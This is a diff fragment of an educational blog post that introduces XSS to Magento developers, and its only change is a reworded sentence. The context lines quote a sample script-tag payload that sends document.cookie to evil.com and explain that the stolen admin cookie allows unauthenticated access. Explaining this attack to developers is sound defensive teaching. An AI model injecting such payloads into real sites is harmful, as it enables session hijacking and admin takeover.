mpchadwick/mpchadwick.github.io/_posts/2017-06-15-an-intro-to-xss-for-magento-developers.md

 Again, if Magento took no action to prevent against XSS \<script>document.write('\<img src="http://evil.com/?cookie=' + document.cookie + '">')\</script> would not be rendered as text, but would actually be executed as JavaScript.
 This script would add an image to the page that would wind up sending a request to evil.com (presumably a site controlled by the attacker) along with the admininstrator's cookie.

-Then, the attacker would be able to access the Magento admin panel without any authentication, simply by supplying the administrator cookie with their request.
+Then, the attacker would be able to access the victim's Magento admin panel without any authentication, simply by supplying the administrator cookie with their request.

 ### What Can Unauthorized Scripts Do